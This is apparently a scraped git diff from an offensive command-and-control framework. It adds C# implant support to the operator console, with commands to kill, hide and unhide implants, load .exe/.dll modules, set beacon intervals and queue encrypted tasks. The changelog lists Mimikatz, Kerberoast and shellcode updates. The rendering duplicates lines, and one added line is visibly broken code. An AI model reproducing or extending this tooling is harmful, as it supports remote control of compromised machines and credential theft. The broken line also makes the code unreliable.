self.PythonCore = """import urllib2, os, subprocess, re, datetime, time, base64, string, random
|
self.PythonCore = """import urllib2, os, subprocess, re, datetime, time, base64, string, random
|
||||||
|
|
|
@ -491,6 +491,67 @@ def runcommand(command, randomuri):
|
||||||
new_task(command, randomuri)
|
new_task(command, randomuri)
|
||||||
return
|
return
|
||||||
|
|
||||||
|
elif implant_type == "C#":
|
||||||
|
if "searchhelp" in command.lower():
|
||||||
|
searchterm = (command.lower()).replace("searchhelp ","")
|
||||||
|
import string
|
||||||
|
helpfull = string.split(sharp_help1, '\n')
|
||||||
|
for line in helpfull:
|
||||||
|
if searchterm in line:
|
||||||
|
print (line)
|
||||||
|
|
||||||
|
elif "unhide-implant" in command.lower():
|
||||||
|
unhide_implant(randomuri)
|
||||||
|
|
||||||
|
elif "hide-implant" in command.lower():
|
||||||
|
kill_implant(randomuri)
|
||||||
|
|
||||||
|
elif "kill-implant" in command.lower() or "exit" in command.lower():
|
||||||
|
impid = get_implantdetails(randomuri)
|
||||||
|
ri = raw_input("Are you sure you want to terminate the implant ID %s? (Y/n) " % impid[0])
|
||||||
|
if ri.lower() == "n":
|
||||||
|
print ("Implant not terminated")
|
||||||
|
if ri == "":
|
||||||
|
pid = get_pid(randomuri)
|
||||||
|
new_task("exit",randomuri)
|
||||||
|
kill_implant(randomuri)
|
||||||
|
if ri.lower() == "y":
|
||||||
|
pid = get_pid(randomuri)
|
||||||
|
new_task("exit" % pid,randomuri)
|
||||||
|
kill_implant(randomuri)
|
||||||
|
|
||||||
|
elif (command.lower() == "ps") or (command.lower() == "ps "):
|
||||||
|
check_module_loaded("Get-ProcessList.dll", randomuri)
|
||||||
|
new_task(command,randomuri)
|
||||||
|
|
||||||
|
elif "loadmoduleforce" in command.lower():
|
||||||
|
params = re.compile("loadmoduleforce ", re.IGNORECASE)
|
||||||
|
params = params.sub("", command)
|
||||||
|
check_module_loaded(params, randomuri, force=True)
|
||||||
|
|
||||||
|
elif "loadmodule" in command.lower():
|
||||||
|
params = re.compile("loadmodule ", re.IGNORECASE)
|
||||||
|
params = params.sub("", command)
|
||||||
|
check_module_loaded(params, randomuri)
|
||||||
|
|
||||||
|
elif command.lower() == "help" or command == "?" or command.lower() == "help ":
|
||||||
|
print (sharp_help1)
|
||||||
|
|
||||||
|
elif (command == "back") or (command == "clear") or (command == "back ") or (command == "clear "):
|
||||||
|
startup()
|
||||||
|
|
||||||
|
elif ('beacon' in command.lower() and '-beacon' not in command.lower()) or 'set-beacon' in command.lower() or 'setbeacon' in command.lower():
|
||||||
|
new_task(command, randomuri)
|
||||||
|
command = command.replace('set-beacon ', '')
|
||||||
|
command = command.replace('setbeacon ', '')
|
||||||
|
command = command.replace('beacon ', '')
|
||||||
|
update_sleep(command, randomuri)
|
||||||
|
|
||||||
|
else:
|
||||||
|
if command:
|
||||||
|
new_task(command, randomuri)
|
||||||
|
return
|
||||||
|
|
||||||
else:
|
else:
|
||||||
try:
|
try:
|
||||||
check_module_loaded("Implant-Core.ps1", randomuri)
|
check_module_loaded("Implant-Core.ps1", randomuri)
|
||||||
|
@ -929,6 +990,11 @@ def commandloop(implant_id):
|
||||||
readline.set_completer_delims('\t')
|
readline.set_completer_delims('\t')
|
||||||
readline.parse_and_bind("tab: complete")
|
readline.parse_and_bind("tab: complete")
|
||||||
readline.set_completer(t.listCompleter)
|
readline.set_completer(t.listCompleter)
|
||||||
|
if hostname[15] == 'C#':
|
||||||
|
t.createListCompleter(SHARPCOMMANDS)
|
||||||
|
readline.set_completer_delims('\t')
|
||||||
|
readline.parse_and_bind("tab: complete")
|
||||||
|
readline.set_completer(t.listCompleter)
|
||||||
print (Colours.GREEN)
|
print (Colours.GREEN)
|
||||||
print ("%s @ %s (PID:%s)" % (hostname[11],hostname[3],hostname[8]))
|
print ("%s @ %s (PID:%s)" % (hostname[11],hostname[3],hostname[8]))
|
||||||
command = raw_input("%s> " % (implant_id))
|
command = raw_input("%s> " % (implant_id))
|
||||||
|
|
File diff suppressed because one or more lines are too long
Binary file not shown.
|
@ -1,5 +1,13 @@
|
||||||
function SSLInspectionCheck($url, $proxyurl, $proxyuser, $proxypass){
|
function SSLInspectionCheck($url, $proxyurl, $proxyuser, $proxypass){
|
||||||
|
|
||||||
|
$expiration = $null
|
||||||
|
$certName = $null
|
||||||
|
$certPublicKeyString = $null
|
||||||
|
$certSerialNumber = $null
|
||||||
|
$certThumbprint = $null
|
||||||
|
$certEffectiveDate = $null
|
||||||
|
$certIssuer = $null
|
||||||
|
|
||||||
write-output "Checking $($url)"
|
write-output "Checking $($url)"
|
||||||
$req = [Net.HttpWebRequest]::Create($url)
|
$req = [Net.HttpWebRequest]::Create($url)
|
||||||
|
|
||||||
|
|
Binary file not shown.
75
Payloads.py
75
Payloads.py
File diff suppressed because one or more lines are too long
8
Tasks.py
8
Tasks.py
|
@ -35,10 +35,16 @@ def newTask(path):
|
||||||
if a[2].startswith("loadmodule"):
|
if a[2].startswith("loadmodule"):
|
||||||
try:
|
try:
|
||||||
module_name = (a[2]).replace("loadmodule ","")
|
module_name = (a[2]).replace("loadmodule ","")
|
||||||
|
if ".exe" in module_name:
|
||||||
|
modulestr = load_module_sharp(module_name)
|
||||||
|
elif ".dll" in module_name:
|
||||||
|
modulestr = load_module_sharp(module_name)
|
||||||
|
else:
|
||||||
modulestr = load_module(module_name)
|
modulestr = load_module(module_name)
|
||||||
command = "loadmodule%s" % modulestr
|
command = "loadmodule%s" % modulestr
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
print "Cannot find module, loadmodule is case sensitive!"
|
print "Cannot find module, loadmodule is case sensitive!"
|
||||||
|
print e
|
||||||
if commands:
|
if commands:
|
||||||
commands += "!d-3dion@LD!-d" + command
|
commands += "!d-3dion@LD!-d" + command
|
||||||
else:
|
else:
|
||||||
|
@ -47,8 +53,6 @@ def newTask(path):
|
||||||
|
|
||||||
if commands is not None:
|
if commands is not None:
|
||||||
multicmd = "multicmd%s" % commands
|
multicmd = "multicmd%s" % commands
|
||||||
|
|
||||||
|
|
||||||
try:
|
try:
|
||||||
responseVal = encrypt(EncKey, multicmd)
|
responseVal = encrypt(EncKey, multicmd)
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
|
|
|
@ -1,5 +1,20 @@
|
||||||
|
4.6 (26/12/18)
|
||||||
|
==============
|
||||||
|
Added Sharp Implant and corresponding DLLs/Shellcode
|
||||||
|
|
||||||
4.5 (19/11/18)
|
4.5 (19/11/18)
|
||||||
==============
|
==============
|
||||||
|
Removed Invoke-Enum
|
||||||
|
Merged Get-TokenElevationType.ps1 by jmhickman
|
||||||
|
Added TLS Config to Python Server
|
||||||
|
Updated README
|
||||||
|
Updated Get-IPAddress
|
||||||
|
Merged OfflineReportGenerator.py by skahwah
|
||||||
|
Updated to latest PowerUp.ps1
|
||||||
|
Updated INSTALL notes
|
||||||
|
Updated to work with FIPSAlgorithmPolicy
|
||||||
|
Updated to latest Invoke-Kerberoast & Invoke-Mimikatz
|
||||||
|
Removed process start for Netsh.exe on non migrate executable
|
||||||
|
|
||||||
4.4 (10/11/18)
|
4.4 (10/11/18)
|
||||||
==============
|
==============
|
||||||
|
|
Loading…
Reference in New Issue